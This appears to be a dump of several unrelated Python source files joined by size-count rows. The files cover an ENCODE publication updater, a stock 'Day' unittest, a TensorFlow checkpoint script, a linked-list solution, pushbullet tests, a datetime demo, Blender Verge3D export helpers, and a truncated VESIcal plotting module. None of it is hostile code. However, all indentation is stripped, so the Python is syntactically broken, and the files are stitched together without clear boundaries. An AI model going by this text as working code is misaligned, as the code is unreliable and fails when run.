encodedcc.patch_ENCODE(uuid, connection, patch_dict)
patch = True
else:
log = "ENCODE missing \"" + key + "\" from Entrez. New key and value must be added"
logger.warning('%s' % log)
if self.UPDATE or self.UPDATE_ONLY:
log = "PATCHing in new key \"" + key + "\""
logger.info('%s' % log)
patch_dict = {key: entrez[key]}
encodedcc.patch_ENCODE(uuid, connection, patch_dict)
patch = True
if not self.UPDATE_ONLY:
for key in extraData.keys():
if type(extraData.get(key)) is list:
if set(encode.get(key, [])) == set(extraData.get(key, [])):
log = "encode \"" + key + "\" matches data in file"
logger.info('%s' % log)
else:
log = "encode \"" + key + "\" value" + str(encode.get(key, [])) + "does not match file"
logger.warning('%s' % log)
if self.UPDATE:
if any(extraData[key]):
patch_dict = {key: extraData[key]}
encodedcc.patch_ENCODE(uuid, connection, patch_dict)
patch = True
else:
log = "No value in file to input for \"" + key + "\""
logger.warning('%s' % log)
if type(extraData.get(key)) is str:
if encode.get(key, "") == extraData.get(key, ""):
log = "encode \"" + key + "\" matches data in file"
logger.info('%s' % log)
else:
log = "encode \"" + key + "\" value" + str(encode.get(key, "")) + "does not match file"
logger.warning('%s' % log)
if self.UPDATE:
patch_dict = {key: extraData[key]}
encodedcc.patch_ENCODE(uuid, connection, patch_dict)
patch = True
if encode.get("status", "") != "published" and (self.UPDATE or self.UPDATE_ONLY):
log = "Setting status to published"
logger.info('%s' % log)
encodedcc.patch_ENCODE(uuid, connection, {"status": "published"})
patch = True
if patch is True:
self.PATCH_COUNT += 1
def find_ENCODE_extras(self, communityList, consortiumList, connection):
'''finds any publications in the ENCODE database
that are not in the files provided
'''
community_url = "/search/?type=publication&status=published\
&published_by=community&field=identifiers&limit=all"
consortium_url = "/search/?type=publication&status=published\
&published_by!=community&field=identifiers&limit=all"
communityResult = encodedcc.get_ENCODE(community_url, connection).get("@graph")
consortiumResult = encodedcc.get_ENCODE(consortium_url, connection).get("@graph")
communityPMIDfromENCODE = [] # list of PMID from ENCODE site
communityOtherID = [] # list of non-PMID ids from ENCODE site
for pub in communityResult:
temp = pub.get("identifiers", [])
for idNum in temp:
if "PMID:" in idNum:
communityPMIDfromENCODE.append(idNum)
# this is something that has a pubmed ID
elif "PMCID:PMC" in idNum:
pass
# this is an alternate PMID
else:
uuid = pub.get("@id")
communityOtherID.append(uuid)
# this is something that does not have a PMID yet, find it and PATCH it in
community_ENCODE_Only = list(set(communityPMIDfromENCODE) - set(communityList))
consortiumPMIDfromENCODE = [] # list of PMID from ENCODE site
consortiumOtherID = [] # list of non-PMID ids from ENCODE site
for pub in consortiumResult:
temp = pub.get("identifiers", [])
for idNum in temp:
if "PMID:" in idNum:
consortiumPMIDfromENCODE.append(idNum)
# this is something that has a pubmed ID
elif "PMCID:PMC" in idNum:
pass
# this is an alternate PMID
else:
uuid = pub.get("@id")
consortiumOtherID.append(uuid)
# this is something that does not have a PMID yet, find it and PATCH it in
consortium_ENCODE_Only = list(set(consortiumPMIDfromENCODE) - set(consortiumList))
return community_ENCODE_Only, communityOtherID, consortium_ENCODE_Only, consortiumOtherID
def main():
args = getArgs()
outfile = args.outfile
CREATE_ONLY = args.createonly
UPDATE_ONLY = args.updateonly
Entrez.email = args.email
key = encodedcc.ENC_Key(args.keyfile, args.key)
connection = encodedcc.ENC_Connection(key)
if args.debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
print("Running on ", connection.server)
publication = PublicationUpdate(args)
if not UPDATE_ONLY:
publication.setup_publication()
pmidList = publication.consortium_ids + publication.community_ids
mergeDicts = publication.consortium_dict.copy()
mergeDicts.update(publication.community_dict) # holds published_by, categories, and data_used
if not CREATE_ONLY:
publication.get_entrez(pmidList)
community_ENCODE_Only, communityOtherID, consortium_ENCODE_Only, consortiumOtherID = publication.find_ENCODE_extras(publication.community_ids, publication.consortium_ids, connection)
total_ENCODE_only = len(community_ENCODE_Only) + len(consortium_ENCODE_Only)
allOtherIDs = communityOtherID + consortiumOtherID
publication.check_ENCODE(pmidList, connection, allOtherIDs, mergeDicts)
log = str(total_ENCODE_only) + " items in ENCODE but not in files"
logger.info('%s' % log)
log = str(publication.PATCH_COUNT) + " publication files PATCHed"
logger.info('%s' % log)
log = str(publication.POST_COUNT) + " publication files POSTed"
logger.info('%s' % log)
print("Results printed to", outfile)
else:
infile = UPDATE_ONLY
with open(infile, 'r') as readfile:
uuidList = [x.rstrip('\n') for x in readfile]
# check each publication to see if it has a PMID, if it does add it to the PMIDlist
# if it does not have one look it up on Entrez
pmid_uuid_dict = {}
for uuid in uuidList:
pub = encodedcc.get_ENCODE(uuid, connection)
title = pub.get("title", "")
identifiers = pub.get("identifiers", [])
found = False
for i in identifiers:
if "PMID:" in i:
p = i.split(":")[1]
found = True
if found:
pmid_uuid_dict[p] = uuid
else:
# search Entrez for publication by title
handle = Entrez.esearch(db="pubmed", term=title)
record = Entrez.read(handle)
idlist = record["IdList"]
if len(idlist) > 1:
log = "More than one possible PMID found for " + uuid
logger.error('%s' % log)
log = str(idlist) + " are possible PMIDs"
logger.error('%s' % log)
elif len(idlist) == 0:
log = "No possible PMID found for " + uuid
logger.error('%s' % log)
else:
handle = Entrez.efetch(db="pubmed", id=idlist, rettype="medline", retmode="text")
records = Medline.parse(handle)
# save the records, you can convert them to a list
records = list(records)
for record in records:
pm = record.get("PMID")
ti = record.get("TI")
log = "Publication " + uuid + " with title \"" + title + "\" matches PMID:" + pm + " with title \"" + ti + "\""
logger.info('%s' % log)
identifiers.append("PMID:" + pm)
encodedcc.patch_ENCODE(uuid, connection, {"identifiers": identifiers})
pmid_uuid_dict[pm] = uuid
pmidList = list(pmid_uuid_dict.keys())
publication.get_entrez(pmidList)
with open("pub_update.txt", "w") as f:
for pmid in pmid_uuid_dict.keys():
publication.compare_entrez_ENCODE(pmid_uuid_dict[pmid], pmid, connection)
f.write(str(len(pmid_uuid_dict.keys())) + " publications checked " + str(publication.PATCH_COUNT) + " publications PATCHed")
if __name__ == '__main__':
main()
| 21,009 | 5,619 |
import unittest
from src.factory import DayFactory, TransactionsFactory
from src.value_objects import Stock, StockTransaction, CashTransaction
from src.day import Day
class DayTest(unittest.TestCase):
def setUp(self):
self.D0: Day = DayFactory().create("D0", ["AAPL 100", "GOOG 200", "SP500 175.75"], 1000)
self.T0 = TransactionsFactory().create([
"AAPL SELL 100 30000",
"GOOG BUY 10 10000",
"CASH DEPOSIT 0 1000",
"CASH FEE 0 50",
"GOOG DIVIDEND 0 50",
"TD BUY 100 10000"
])
self.stock_list = ["AAPL", "GOOG", "SP500"]
def test_set_catalog(self):
self.assertEqual(self.stock_list, self.D0.catalog)
def test_get_stocks(self):
self.assertEqual({"AAPL": 100, "GOOG": 200, "SP500": 175.75}, self.D0.get_stocks())
def test_add(self):
stock = Stock("MSFT", 100)
self.D0.add(stock)
self.assertEqual(self.D0.stocks[3], stock)
def test_fill(self):
facebook = Stock("F", 100)
uber = Stock("Uber", 100)
stocks = [facebook, uber]
length = len(self.D0.stocks)
self.D0.fill(stocks)
self.assertEqual(self.D0.stocks[length].symbol, facebook.symbol)
def test_add_stock_transaction(self):
self.D0.add_stock_transaction(self.T0[0])
self.assertEqual(self.D0.transactions["AAPL"][0]['amount'], -100)
def test_add_cash_transaction(self):
transaction = CashTransaction("CASH", "0", 1000, "DEPOSIT")
self.D0.add_cash_transaction(transaction)
self.assertEqual(self.D0.cash_transactions[0], 1000)
def test_add_transactions(self):
self.D0.transactions = []
self.D0.cash_transactions = []
def test_get_closing_stocks(self):
self.assertEqual({'AAPL': 100.0, 'GOOG': 200.0, 'SP500': 175.75}, self.D0.get_closing_stocks())
def test_get_closing_cash(self):
self.assertEqual(self.D0.get_closing_cash(), 1000)
if __name__ == '__main__':
unittest.main()
| 2,044 | 826 |
# Author: Mark Buckler
"""Quantization"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
from datetime import datetime
import os.path
import sys
import time
import numpy as np
from six.moves import xrange
import tensorflow as tf
from config import *
from dataset import pascal_voc, kitti
from utils.util import bbox_transform, Timer
from nets import *
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('checkpoint_path', '/tmp/bichen/logs/squeezeDet/train',
"""Path to the training checkpoint.""")
tf.app.flags.DEFINE_string('net', 'squeezeDet',
"""Neural net architecture.""")
from tensorflow.python import pywrap_tensorflow
def quantize():
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
with tf.Graph().as_default() as g:
assert FLAGS.net == 'vgg16' or FLAGS.net == 'resnet50' \
or FLAGS.net == 'squeezeDet' or FLAGS.net == 'squeezeDet+', \
'Selected neural net architecture not supported: {}'.format(FLAGS.net)
if FLAGS.net == 'vgg16':
mc = kitti_vgg16_config()
mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1
mc.LOAD_PRETRAINED_MODEL = False
model = VGG16ConvDet(mc)
elif FLAGS.net == 'resnet50':
mc = kitti_res50_config()
mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1
mc.LOAD_PRETRAINED_MODEL = False
model = ResNet50ConvDet(mc)
elif FLAGS.net == 'squeezeDet':
mc = kitti_squeezeDet_config()
mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1
mc.LOAD_PRETRAINED_MODEL = False
model = SqueezeDet(mc)
elif FLAGS.net == 'squeezeDet+':
mc = kitti_squeezeDetPlus_config()
mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1
mc.LOAD_PRETRAINED_MODEL = False
model = SqueezeDetPlus(mc)
# Start a session
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
# Load in the metagraph
ckpt_path = FLAGS.checkpoint_path
saver = tf.train.import_meta_graph(ckpt_path+'.meta',clear_devices=True)
saver.restore(sess, ckpt_path)
# Initialize the variables
sess.run(tf.global_variables_initializer())
# Extract the variables into a list
all_vars = tf.all_variables()
for var in all_vars:
if (('kernels' in var.name) and (not ('Momentum' in var.name))):
print(var.name)
print(sess.run(var))
add_1_op = tf.assign(var,var + 1)
sess.run(add_1_op)
print(sess.run(var))
exit()
return
def main(argv=None): # pylint: disable=unused-argument
quantize()
if __name__ == '__main__':
tf.app.run()
| 2,832 | 1,009 |
# Anders Poirel
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
fast = head
slow = head
for i in range(n-1):
fast = fast.next
while fast.next is not None:
fast = fast.next
prev = slow
slow = slow.next
if slow == head:
head = slow.next
else:
prev.next = slow.next
return head
| 579 | 163 |
import pytest
from runflow import runflow
pytest.importorskip('slack_sdk')
def test_pushbullet_push_note(mocker):
pb = mocker.MagicMock()
mocker.patch('pushbullet.Pushbullet', pb)
runflow(path="examples/pushbullet_push_note.hcl", vars={
'pushbullet_api_key': 'any'
})
pb.return_value.push_note.assert_called_with(
title='This is the title',
body='This is the note',
email='',
channel=None,
)
def test_pushbullet_push_link(mocker):
pb = mocker.MagicMock()
mocker.patch('pushbullet.Pushbullet', pb)
runflow(path="examples/pushbullet_push_link.hcl", vars={
'pushbullet_api_key': 'any'
})
pb.return_value.push_link.assert_called_with(
title='This is the title',
url='https://runflow.org',
body='',
email='',
channel=None,
)
def test_pushbullet_push_file(mocker):
pb = mocker.MagicMock()
mocker.patch('pushbullet.Pushbullet', pb)
runflow(path="examples/pushbullet_push_file.hcl", vars={
'pushbullet_api_key': 'any',
})
pb.return_value.push_file.assert_called_with(
title='This is the title',
body='This is the body',
file_type='image/jpeg',
file_name='cat.jpg',
file_url='https://i.imgur.com/IAYZ20i.jpg',
email='',
channel=None,
)
def test_pushbullet_invalid_client(mocker, capsys):
pb = mocker.MagicMock()
mocker.patch('pushbullet.Pushbullet', pb)
runflow(source="""
flow "invalid_client" {
task "pushbullet_push" "this" {
client = {
}
}
}
""")
out, err = capsys.readouterr()
assert 'set api_key' in err
| 1,674 | 593 |
"""Date and time"""
# imports
import arrow
from datetime import date, datetime, timedelta, timezone
import time
import calendar as cal
from zoneinfo import ZoneInfo
# arrow small demo
# date
today = date.today()
print(today)
# datetime.date(2021, 3, 28)
print(today.ctime())
print(today.isoformat())
print(today.weekday())
print(cal.day_name[today.weekday()])
print(today.day, today.month, today.year)
print(today.timetuple())
# print(time.struct_time(tm_year=2021, tm_mon=3, tm_mday=28, tm_hour=0, tm_min=0, tm_sec=0,
# tm_wday=6, tm_yday=87, tm_isdst=-1))
# time
time.ctime()
print(time.daylight)
time.gmtime()
# time.struct_time(
# tm_year=2021, tm_mon=3, tm_mday=28,
# tm_hour=14, tm_min=23, tm_sec=34,
# tm_wday=6, tm_yday=87, tm_isdst=0
# )
time.gmtime(0)
# time.struct_time(
# tm_year=1970, tm_mon=1, tm_mday=1,
# tm_hour=0, tm_min=0, tm_sec=0,
# tm_wday=3, tm_yday=1, tm_isdst=0
# )
time.localtime()
# time.struct_time(
# tm_year=2021, tm_mon=3, tm_mday=28,
# tm_hour=15, tm_min=23, tm_sec=50,
# tm_wday=6, tm_yday=87, tm_isdst=1
# )
time.time()
# datetime, timezones and timedelta
now = datetime.now()
utcnow = datetime.utcnow()
print(now)
# datetime.datetime(2021, 3, 28, 15, 25, 16, 258274)
print(utcnow)
# datetime.datetime(2021, 3, 28, 14, 25, 22, 918195)
print(now.date())
# datetime.date(2021, 3, 28)
print(now.day, now.month, now.year)
var = now.date() == date.today()
print(now.time())
# datetime.time(15, 25, 16, 258274)
# now.hour, now.minute, now.second, now.microsecond
now.ctime()
# 'Sun Mar 28 15:25:16 2021'
now.isoformat()
# '2021-03-28T15:25:16.258274'
now.timetuple()
# time.struct_time(
# tm_year=2021, tm_mon=3, tm_mday=28,
# tm_hour=15, tm_min=25, tm_sec=16,
# tm_wday=6, tm_yday=87, tm_isdst=-1
# )
print(now.tzinfo)
print(utcnow.tzinfo)
now.weekday()
# 6
f_bday = datetime(
1975, 12, 29, 12, 50, tzinfo=ZoneInfo('Europe/Rome')
)
h_bday = datetime(
1981, 10, 7, 15, 30, 50, tzinfo=timezone(timedelta(hours=2))
)
diff = h_bday - f_bday
type(diff)
# <class 'datetime.timedelta'>
print(diff.days)
# 2109
diff.total_seconds()
# 182223650.0
today + timedelta(days=49)
# datetime.date(2021, 5, 16)
now + timedelta(weeks=7)
# datetime.datetime(2021, 5, 16, 15, 25, 16, 258274)
# parsing (stdlib)
datetime.fromisoformat('1977-11-24T19:30:13+01:00')
# datetime.datetime(
# 1977, 11, 24, 19, 30, 13,
# tzinfo=datetime.timezone(datetime.timedelta(seconds=3600))
# )
datetime.fromtimestamp(time.time())
# datetime.datetime(2021, 3, 28, 15, 42, 2, 142696)
datetime.now()
# datetime.datetime(2021, 3, 28, 15, 42, 1, 120094)
arrow.utcnow()
# <Arrow [2021-03-28T14:43:20.017213+00:00]>
arrow.now()
# <Arrow [2021-03-28T15:43:39.370099+01:00]>
local = arrow.now('Europe/Rome')
print(local)
# <Arrow [2021-03-28T16:59:14.093960+02:00]>
local.to('utc')
# <Arrow [2021-03-28T14:59:14.093960+00:00]>
local.to('Europe/Moscow')
# <Arrow [2021-03-28T17:59:14.093960+03:00]>
local.to('Asia/Tokyo')
# <Arrow [2021-03-28T23:59:14.093960+09:00]>
print(local.datetime)
# datetime.datetime(
# 2021, 3, 28, 16, 59, 14, 93960,
# tzinfo=tzfile('/usr/share/zoneinfo/Europe/Rome')
# )
local.isoformat()
# '2021-03-28T16:59:14.093960+02:00'
| 3,269 | 1,804 |
# Copyright (c) 2017-2019 Soft8Soft LLC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import math
import bpy
import numpy as np
import mathutils
import pyosl.glslgen
ORTHO_EPS = 1e-5
DEFAULT_MAT_NAME = 'v3d_default_material'
selectedObject = None
selectedObjectsSave = []
prevActiveObject = None
def clamp(val, minval, maxval):
return max(minval, min(maxval, val))
def integerToBlSuffix(val):
suf = str(val)
for i in range(0, 3 - len(suf)):
suf = '0' + suf
return suf
def getLightCyclesStrength(bl_light):
return bl_light.energy
def getLightCyclesColor(bl_light):
col = bl_light.color
return [col[0], col[1], col[2]]
def setSelectedObject(bl_obj):
"""
Select object for NLA baking
"""
global prevActiveObject
global selectedObject, selectedObjectsSave
selectedObject = bl_obj
selectedObjectsSave = bpy.context.selected_objects.copy()
# NOTE: seems like we need both selection and setting active object
for o in selectedObjectsSave:
o.select_set(False)
prevActiveObject = bpy.context.view_layer.objects.active
bpy.context.view_layer.objects.active = bl_obj
bl_obj.select_set(True)
def restoreSelectedObjects():
global prevActiveObject
global selectedObject, selectedObjectsSave
selectedObject.select_set(False)
for o in selectedObjectsSave:
o.select_set(True)
bpy.context.view_layer.objects.active = prevActiveObject
prevActiveObject = None
selectedObject = None
selectedObjectsSave = []
def getSceneByObject(obj):
for scene in bpy.data.scenes:
index = scene.objects.find(obj.name)
if index > -1 and scene.objects[index] == obj:
return scene
return None
def getTexImage(bl_tex):
"""
Get texture image from a texture, avoiding AttributeError for textures
without an image (e.g. a texture of type 'NONE').
"""
return getattr(bl_tex, 'image', None)
def getTextureName(bl_texture):
if (isinstance(bl_texture, (bpy.types.ShaderNodeTexImage,
bpy.types.ShaderNodeTexEnvironment))):
tex_name = bl_texture.image.name
else:
tex_name = bl_texture.name
return tex_name
def mat4IsIdentity(mat4):
return mat4 == mathutils.Matrix.Identity(4)
def mat4IsTRSDecomposable(mat4):
# don't use mathutils.Matrix.is_orthogonal_axis_vectors property, because it
# doesn't normalize vectors before checking
mat = mat4.to_3x3().transposed()
v0 = mat[0].normalized()
v1 = mat[1].normalized()
v2 = mat[2].normalized()
return (abs(v0.dot(v1)) < ORTHO_EPS
and abs(v0.dot(v2)) < ORTHO_EPS
and abs(v1.dot(v2)) < ORTHO_EPS)
def mat4SvdDecomposeToMatrs(mat4):
"""
Decompose the given matrix into a couple of TRS-decomposable matrices or
Returns None in case of an error.
"""
try:
u, s, vh = np.linalg.svd(mat4.to_3x3())
mat_u = mathutils.Matrix(u)
mat_s = mathutils.Matrix([[s[0], 0, 0], [0, s[1], 0], [0, 0, s[2]]])
mat_vh = mathutils.Matrix(vh)
# NOTE: a potential reflection part in U and VH matrices isn't considered
mat_trans = mathutils.Matrix.Translation(mat4.to_translation())
mat_left = mat_trans @ (mat_u @ mat_s).to_4x4()
return (mat_left, mat_vh.to_4x4())
except np.linalg.LinAlgError:
# numpy failed to decompose the matrix
return None
def findArmature(obj):
for mod in obj.modifiers:
if mod.type == 'ARMATURE' and mod.object is not None:
return mod.object
# use obj.find_armature as a last resort, because it doesn't work with many
# armature modifiers
return obj.find_armature()
def matHasBlendBackside(bl_mat):
return (matIsBlend(bl_mat) and
(hasattr(bl_mat, 'show_transparent_back') and bl_mat.show_transparent_back))
def matIsBlend(bl_mat):
return bl_mat.blend_method in ['BLEND', 'MULTIPLY', 'ADD']
def updateOrbitCameraView(cam_obj, scene):
target_obj = cam_obj.data.v3d.orbit_target_object
eye = cam_obj.matrix_world.to_translation()
target = (cam_obj.data.v3d.orbit_target if target_obj is None
else target_obj.matrix_world.to_translation())
quat = getLookAtAlignedUpMatrix(eye, target).to_quaternion()
quat.rotate(cam_obj.matrix_world.inverted())
quat.rotate(cam_obj.matrix_basis)
rot_mode = cam_obj.rotation_mode
cam_obj.rotation_mode = 'QUATERNION'
cam_obj.rotation_quaternion = quat
cam_obj.rotation_mode = rot_mode
# need to update the camera state (i.e. world matrix) immediately in case of
# several consecutive UI updates
bpy.context.view_layer.update()
def getLookAtAlignedUpMatrix(eye, target):
"""
This method uses camera axes for building the matrix.
"""
axis_z = (eye - target).normalized()
if axis_z.length == 0:
axis_z = mathutils.Vector((0, -1, 0))
axis_x = mathutils.Vector((0, 0, 1)).cross(axis_z)
if axis_x.length == 0:
axis_x = mathutils.Vector((1, 0, 0))
axis_y = axis_z.cross(axis_x)
return mathutils.Matrix([
axis_x,
axis_y,
axis_z,
]).transposed()
def objDataUsesLineRendering(bl_obj_data):
line_settings = getattr(getattr(bl_obj_data, 'v3d', None), 'line_rendering_settings', None)
return bool(line_settings and line_settings.enable)
def getObjectAllCollections(blObj):
return [coll for coll in bpy.data.collections if blObj in coll.all_objects[:]]
def getBlurPixelRadius(context, blLight):
if blLight.type == 'SUN':
relativeRadius = (blLight.shadow_buffer_soft / 100
* int(context.scene.eevee.shadow_cascade_size))
# blur strength doesn't increase after a certain point
return min(max(relativeRadius, 0), 100)
else:
blurGrade = math.floor(blLight.shadow_buffer_soft
* int(context.scene.eevee.shadow_cube_size) / 1000)
blurGrade = min(blurGrade, 9)
# some approximation of Blender blur radius
if blurGrade > 2:
return 4.22 * (blurGrade - 1.5)
else:
return blurGrade
def objHasExportedModifiers(obj):
"""
Check if an object has any modifiers that should be applied before export.
"""
return any([modifierNeedsExport(mod) for mod in obj.modifiers])
def obj_del_not_exported_modifiers(obj):
"""
Remove modifiers that shouldn't be applied before export from an object.
"""
for mod in obj.modifiers:
if not modifierNeedsExport(mod):
obj.modifiers.remove(mod)
def objAddTriModifier(obj):
mod = obj.modifiers.new('Temporary_Triangulation', 'TRIANGULATE')
mod.quad_method = 'FIXED'
mod.keep_custom_normals = True
def objApplyModifiers(obj):
"""
Creates a new mesh from applying modifiers to the mesh of the given object.
Assignes the newly created mesh to the given object. The old mesh's user
count will be decreased by 1.
"""
dg = bpy.context.evaluated_depsgraph_get()
need_linking = dg.scene.collection.objects.find(obj.name) == -1
need_showing = obj.hide_viewport
# NOTE: link the object if it's not in the 'Master Collection' and update
# the view layer to make the depsgraph able to apply modifiers to the object
if need_linking:
dg.scene.collection.objects.link(obj)
obj.update_tag()
# a hidden object doesn't get its modifiers applied, need to make it visible
# before updating the view layer
if need_showing:
obj.hide_viewport = False
bpy.context.view_layer.update()
# NOTE: some modifiers can remove UV layers from an object after applying
# (e.g. Skin), which is a consistent behavior regarding uv usage in the
# viewport (e.g. degenerate tangent space in the Normal Map node)
obj_eval = obj.evaluated_get(dg)
obj.data = bpy.data.meshes.new_from_object(obj_eval,
preserve_all_data_layers=True, depsgraph=dg)
obj.modifiers.clear()
if need_linking:
dg.scene.collection.objects.unlink(obj)
if need_showing:
obj.hide_viewport = True
def objTransferShapeKeys(obj_from, obj_to, depsgraph):
"""
Transfer shape keys from one object to another if it's possible:
- obj_from should be in the current view layer to be evaluated by depsgraph
- obj_to should not have shape keys
- obj_from (after evaluating) and obj_to should have the same amount of vertices
Returns a boolean flag indicating successful transfer.
"""
if obj_from.data.shape_keys is None:
return True
key_blocks_from = obj_from.data.shape_keys.key_blocks
keys_from = [key for key in key_blocks_from if key != key.relative_key
and key != obj_from.data.shape_keys.reference_key]
key_names = [key.name for key in keys_from]
key_values = [key.value for key in keys_from]
key_positions = []
for key in keys_from:
key.value = 0
same_vertex_count = True
for key in keys_from:
key.value = 1
obj_from.update_tag()
bpy.context.view_layer.update()
verts = obj_from.evaluated_get(depsgraph).data.vertices
if len(verts) != len(obj_to.data.vertices):
same_vertex_count = False
break
key_pos = [0] * 3 * len(verts)
verts.foreach_get('co', key_pos)
key_positions.append(key_pos)
key.value = 0
if same_vertex_count:
# basis shape key
obj_to.shape_key_add(name=obj_from.data.shape_keys.reference_key.name)
vert_co = [0] * 3 * len(obj_to.data.vertices)
for i in range(len(key_names)):
key_block = obj_to.shape_key_add(name=key_names[i])
key_block.value = key_values[i]
key_block.data.foreach_set('co', key_positions[i])
else:
# don't create nothing if vertex count isn't constant
pass
for i in range(len(keys_from)):
keys_from[i].value = key_values[i]
return same_vertex_count
def meshNeedTangentsForExport(mesh, optimize_tangents):
"""
Check if it's needed to export tangents for the given mesh.
"""
return (meshHasUvLayers(mesh) and (meshMaterialsUseTangents(mesh)
or not optimize_tangents))
def meshHasUvLayers(mesh):
return bool(mesh.uv_layers.active and len(mesh.uv_layers) > 0)
def meshMaterialsUseTangents(mesh):
for mat in mesh.materials:
if mat and mat.use_nodes and mat.node_tree != None:
node_trees = extractMaterialNodeTrees(mat.node_tree)
for node_tree in node_trees:
for bl_node in node_tree.nodes:
if matNodeUseTangents(bl_node):
return True
# HACK: in most cases this one indicates that object linking is used
# disable tangent optimizations for such cases
elif mat == None:
return True
return False
def matNodeUseTangents(bl_node):
if isinstance(bl_node, bpy.types.ShaderNodeNormalMap):
return True
if (isinstance(bl_node, bpy.types.ShaderNodeTangent)
and bl_node.direction_type == 'UV_MAP'):
return True
if isinstance(bl_node, bpy.types.ShaderNodeNewGeometry):
for out in bl_node.outputs:
if out.identifier == 'Tangent' and out.is_linked:
return True
return False
def extractMaterialNodeTrees(node_tree):
"""NOTE: located here since it's needed for meshMaterialsUseTangents()"""
out = [node_tree]
for bl_node in node_tree.nodes:
if isinstance(bl_node, bpy.types.ShaderNodeGroup):
out += extractMaterialNodeTrees(bl_node.node_tree)
return out
def meshHasNgons(mesh):
for poly in mesh.polygons:
if poly.loop_total > 4:
return True
return False
def modifierNeedsExport(mod):
"""
Modifiers that are applied before export shouldn't be:
- hidden during render (a way to disable export of a modifier)
- ARMATURE modifiers (used separately via skinning)
"""
return mod.show_render and mod.type != 'ARMATURE'
def getSocketDefvalCompat(socket, RGBAToRGB=False, isOSL=False):
"""
Get the default value of input/output sockets in some compatible form.
Vector types such as bpy_prop_aray, Vector, Euler, etc... are converted to lists,
primitive types are converted to int/float.
"""
if socket.type == 'VALUE' or socket.type == 'INT':
return socket.default_value
elif socket.type == 'BOOLEAN':
return int(socket.default_value)
elif socket.type == 'VECTOR':
return [i for i in socket.default_value]
elif socket.type == 'RGBA':
val = [i for i in socket.default_value]
if RGBAToRGB:
val = val[0:3]
return val
elif socket.type == 'SHADER':
# shader sockets have no default value
return [0, 0, 0, 0]
elif socket.type == 'STRING' and isOSL:
# for now used for OSL only
return pyosl.glslgen.string_to_osl_const(socket.default_value)
elif socket.type == 'CUSTOM':
# not supported
return 0
else:
return 0
def createCustomProperty(bl_element):
"""
Filters and creates a custom property, which is stored in the glTF extra field.
"""
if not bl_element:
return None
props = {}
# Custom properties, which are in most cases present and should not be exported.
black_list = ['cycles', 'cycles_visibility', 'cycles_curves', '_RNA_UI', 'v3d']
count = 0
for custom_property in bl_element.keys():
if custom_property in black_list:
continue
value = bl_element[custom_property]
add_value = False
if isinstance(value, str):
add_value = True
if isinstance(value, (int, float)):
add_value = True
if hasattr(value, "to_list"):
value = value.to_list()
add_value = True
if add_value:
props[custom_property] = value
count += 1
if count == 0:
return None
return props
def calcLightThresholdDist(bl_light, threshold):
"""Calculate the light attenuation distance from the given threshold.
The light power at this distance equals the threshold value.
"""
return math.sqrt(max(1e-16,
max(bl_light.color.r, bl_light.color.g, bl_light.color.b)
* max(1, bl_light.specular_factor)
* abs(bl_light.energy / 100)
/ max(threshold, 1e-16)
))
| 15,176 | 4,979 |
#!/usr/bin/python
# Look at the story mappings from rimworld.log
# cat rimworld.log | grep backstory | sort -u > stories.txt
# RimWorld handles the mappings, but pollutes its log when it does so.
f = open( 'stories.txt' )
print 'mappings = {'
for l in f.readlines():
x = l.strip().split(' ')
if 'Giving random' in l:
continue
elif 'or any close match' in l:
print '\t\'%s\': \'VideoGamer91\',' % ( x[6].replace( ',', '' ) )
else:
print '\t\'%s\': \'%s\',' % ( x[6], x[11], )
print '}'
| 531 | 199 |
from VESIcal import core
from VESIcal import calibrations
from VESIcal.tasplot import add_LeMaitre_fields
import pandas as pd
import numpy as np
import warnings as w
import matplotlib as mpl
import matplotlib.pyplot as plt
# ---------- DEFINE CUSTOM PLOTTING FORMATTING ------------ #
style = "seaborn-colorblind"
plt.style.use(style)
plt.rcParams["mathtext.default"] = "regular"
plt.rcParams["mathtext.fontset"] = "dejavusans"
mpl.rcParams['patch.linewidth'] = 1
mpl.rcParams['axes.linewidth'] = 1
plt.rcParams['axes.titlesize'] = 20
plt.rcParams['axes.labelsize'] = 18
plt.rcParams['xtick.labelsize'] = 14
plt.rcParams['ytick.labelsize'] = 14
plt.rcParams['legend.fontsize'] = 14
mpl.rcParams['lines.markersize'] = 10
# Define color cycler based on plot style set here
# get style formatting set by plt.style.use():
the_rc = plt.style.library[style]
# list of colors by hex code:
color_list = the_rc['axes.prop_cycle'].by_key()['color'] * 10
color_cyler = the_rc['axes.prop_cycle'] # get the cycler
# ----------- MAGMASAT PLOTTING FUNCTIONS ----------- #
def smooth_isobars_and_isopleths(isobars=None, isopleths=None):
"""
Takes in a dataframe with calculated isobar and isopleth information
(e.g., output from calculate_isobars_and_isopleths) and smooths the data
for plotting.
Parameters
----------
isobars: pandas DataFrame
OPTIONAL. DataFrame object containing isobar information as calculated
by calculate_isobars_and_isopleths.
isopleths: pandas DataFrame
OPTIONAL. DataFrame object containing isopleth information as
calculated by calculate_isobars_and_isopleths.
Returns
-------
pandas DataFrame
DataFrame with x and y values for all isobars and all isopleths.
Useful if a user wishes to do custom plotting with isobar and isopleth
data rather than using the built-in `plot_isobars_and_isopleths()`
function.
"""
np.seterr(divide='ignore', invalid='ignore') # turn off numpy warning
w.filterwarnings("ignore", message="Polyfit may be poorly conditioned")
if isobars is not None:
P_vals = isobars.Pressure.unique()
isobars_lists = isobars.values.tolist()
# add zero values to volatiles list
isobars_lists.append([0.0, 0.0, 0.0, 0.0])
isobars_pressure = []
isobars_H2O_liq = []
isobars_CO2_liq = []
# do some data smoothing
for pressure in P_vals:
Pxs = [item[1] for item in isobars_lists if item[0] == pressure]
Pys = [item[2] for item in isobars_lists if item[0] == pressure]
try:
